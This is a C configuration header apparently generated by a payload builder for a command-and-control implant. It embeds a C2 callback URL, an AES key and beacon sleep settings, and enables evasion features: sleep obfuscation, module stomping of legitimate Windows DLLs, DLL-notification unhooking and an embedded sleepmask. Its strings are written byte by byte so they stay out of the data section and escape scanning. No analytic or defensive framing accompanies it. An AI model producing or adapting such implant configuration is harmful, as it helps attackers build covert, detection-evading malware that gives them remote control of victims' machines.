/* Config.h - generated by BuildPayload
 *
 *   C2 URL:   http://192.168.45.200/api/v1/status
 *   AES Key:  3238cab8b631e3580645240027a7fbba
 *   Sleep:    10000 ms   Jitter: 0%
 *   Profile:  v2, 341 bytes
 */

#pragma once

#define NAX_SLEEP_MS    10000u
#define NAX_JITTER_PCT  0u
#define NAX_SID_LEN     17u
#define NAX_WATERMARK   0xA04A4178u
#define NAX_LISTENER_WM 0x4F93A855u

#define NAX_GATE_SLEEP
#define NAX_GATE_WAITFORSINGLEOBJECT
#define NAX_GATE_WAITFORMULTIPLEOBJECTS

/* PIC-safe per-byte writes - prevents GCC from pooling into .rdata */
#define NAX_AES_KEY_WRITE( p ) do { \
    (p)[ 0]=0x32; (p)[ 1]=0x38; (p)[ 2]=0xCA; (p)[ 3]=0xB8; (p)[ 4]=0xB6; (p)[ 5]=0x31; (p)[ 6]=0xE3; (p)[ 7]=0x58; \
    (p)[ 8]=0x06; (p)[ 9]=0x45; (p)[10]=0x24; (p)[11]=0x00; (p)[12]=0x27; (p)[13]=0xA7; (p)[14]=0xFB; (p)[15]=0xBA; \
} while(0)

#define NAX_C2_URL_WRITE( p ) do { \
    (p)[ 0]='h'; (p)[ 1]='t'; (p)[ 2]='t'; (p)[ 3]='p'; (p)[ 4]=':'; (p)[ 5]='/'; (p)[ 6]='/'; (p)[ 7]='1'; \
    (p)[ 8]='9'; (p)[ 9]='2'; (p)[10]='.'; (p)[11]='1'; (p)[12]='6'; (p)[13]='8'; (p)[14]='.'; (p)[15]='4'; \
    (p)[16]='5'; (p)[17]='.'; (p)[18]='2'; (p)[19]='0'; (p)[20]='0'; (p)[21]='/'; (p)[22]='a'; (p)[23]='p'; \
    (p)[24]='i'; (p)[25]='/'; (p)[26]='v'; (p)[27]='1'; (p)[28]='/'; (p)[29]='s'; (p)[30]='t'; (p)[31]='a'; \
    (p)[32]='t'; (p)[33]='u'; (p)[34]='s'; \
    (p)[35]='\0'; \
} while(0)

#define NAX_PROFILE_LEN  341u
#include "Config_profile.h"

/* ---- sleep obfuscation defaults ---- */
#define NAX_DEFAULT_SLEEP_OBF   1

/* ---- BOF module stomping ---- */
#define NAX_BOF_STOMP 1

#define NAX_BOF_SYNC_DLL_WRITE( p ) do { \
    (p)[ 0]=L'c'; (p)[ 1]=L'h'; (p)[ 2]=L'a'; (p)[ 3]=L'k'; \
    (p)[ 4]=L'r'; (p)[ 5]=L'a'; (p)[ 6]=L'.'; (p)[ 7]=L'd'; \
    (p)[ 8]=L'l'; (p)[ 9]=L'l'; \
    (p)[10]=L'\0'; \
} while(0)

#define NAX_BOF_ASYNC_COUNT 3

#define NAX_BOF_ASYNC_0_WRITE( p ) do { \
    (p)[ 0]=L'j'; (p)[ 1]=L's'; (p)[ 2]=L'c'; (p)[ 3]=L'r'; \
    (p)[ 4]=L'i'; (p)[ 5]=L'p'; (p)[ 6]=L't'; (p)[ 7]=L'9'; \
    (p)[ 8]=L'.'; (p)[ 9]=L'd'; (p)[10]=L'l'; (p)[11]=L'l'; \
    (p)[12]=L'\0'; \
} while(0)

#define NAX_BOF_ASYNC_1_WRITE( p ) do { \
    (p)[ 0]=L'm'; (p)[ 1]=L's'; (p)[ 2]=L'h'; (p)[ 3]=L't'; \
    (p)[ 4]=L'm'; (p)[ 5]=L'l'; (p)[ 6]=L'.'; (p)[ 7]=L'd'; \
    (p)[ 8]=L'l'; (p)[ 9]=L'l'; \
    (p)[10]=L'\0'; \
} while(0)

#define NAX_BOF_ASYNC_2_WRITE( p ) do { \
    (p)[ 0]=L'd'; (p)[ 1]=L'3'; (p)[ 2]=L'd'; (p)[ 3]=L'1'; \
    (p)[ 4]=L'1'; (p)[ 5]=L'.'; (p)[ 6]=L'd'; (p)[ 7]=L'l'; \
    (p)[ 8]=L'l'; \
    (p)[ 9]=L'\0'; \
} while(0)

/* ---- sleepmask stomp DLL ---- */
#define NAX_SM_STOMP_DLL_WRITE( p ) do { \
    (p)[ 0]=L'm'; (p)[ 1]=L's'; (p)[ 2]=L'x'; (p)[ 3]=L'm'; \
    (p)[ 4]=L'l'; (p)[ 5]=L'6'; (p)[ 6]=L'.'; (p)[ 7]=L'd'; \
    (p)[ 8]=L'l'; (p)[ 9]=L'l'; \
    (p)[10]=L'\0'; \
} while(0)

/* ---- DLL notification unhooking ---- */
#define NAX_UNHOOK_DLL_NOTIFY 1

/* ---- embedded sleepmask BOF ---- */
#define NAX_SLEEPMASK_LEN  4988u
#include "Config_sleepmask.h"
